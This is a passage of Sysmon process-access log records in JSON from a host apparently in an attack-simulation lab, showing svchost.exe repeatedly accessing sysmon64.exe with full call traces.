05:48:45.076","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3570,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.076\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.076","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3571,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.076\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.076","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3572,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.076\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.076","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3573,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.076\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.076","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3574,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.076\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.076","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3575,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.076\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.076","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3576,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.076\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.076","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3577,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.076\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.076","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\W